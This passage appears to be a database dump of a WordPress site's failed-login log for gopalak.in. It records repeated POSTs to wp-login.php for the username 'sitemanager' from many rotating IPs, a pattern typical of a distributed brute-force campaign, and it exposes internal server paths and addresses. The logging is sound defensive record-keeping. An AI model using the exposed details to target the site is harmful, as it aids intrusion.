00:00:00'),(95660,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34786\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.139\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747045128.7387021;s:12:\"REQUEST_TIME\";i:1747045128;}}','199.188.200.139',0,'2025-05-12 15:48:50','1970-01-01 00:00:00'),(95661,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45340\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.215.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747045543.826606;s:12:\"REQUEST_TIME\";i:1747045543;}}','162.0.215.190',0,'2025-05-12 15:55:45','1970-01-01 00:00:00'),(95662,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45534\";s:11:\"REMOTE_ADDR\";s:15:\"173.212.207.177\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747045955.693841;s:12:\"REQUEST_TIME\";i:1747045955;}}','173.212.207.177',0,'2025-05-12 16:02:37','1970-01-01 00:00:00'),(95663,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40416\";s:11:\"REMOTE_ADDR\";s:12:\"63.250.38.57\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747046372.315275;s:12:\"REQUEST_TIME\";i:1747046372;}}','63.250.38.57',0,'2025-05-12 16:09:34','1970-01-01 00:00:00'),(95664,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47148\";s:11:\"REMOTE_ADDR\";s:12:\"31.172.67.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747046787.1754129;s:12:\"REQUEST_TIME\";i:1747046787;}}','31.172.67.59',0,'2025-05-12 16:16:28','1970-01-01 00:00:00'),(95665,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33470\";s:11:\"REMOTE_ADDR\";s:13:\"78.128.76.202\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747047207.9778869;s:12:\"REQUEST_TIME\";i:1747047207;}}','78.128.76.202',0,'2025-05-12 16:23:29','1970-01-01 00:00:00'),(95666,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50454\";s:11:\"REMOTE_ADDR\";s:13:\"164.160.91.19\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747047623.7753091;s:12:\"REQUEST_TIME\";i:1747047623;}}','164.160.91.19',0,'2025-05-12 16:30:25','1970-01-01 00:00:00'),(95667,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39216\";s:11:\"REMOTE_ADDR\";s:14:\"185.145.245.84\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747048043.922929;s:12:\"REQUEST_TIME\";i:1747048043;}}','185.145.245.84',0,'2025-05-12 16:37:25','1970-01-01 00:00:00'),(95668,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57028\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.123.34\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747048466.8920629;s:12:\"REQUEST_TIME\";i:1747048466;}}','68.65.123.34',0,'2025-05-12 16:44:28','1970-01-01 00:00:00'),(95669,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46982\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.120.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747048887.417783;s:12:\"REQUEST_TIME\";i:1747048887;}}','198.54.120.17',0,'2025-05-12 16:51:29','1970-01-01 00:00:00'),(95670,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 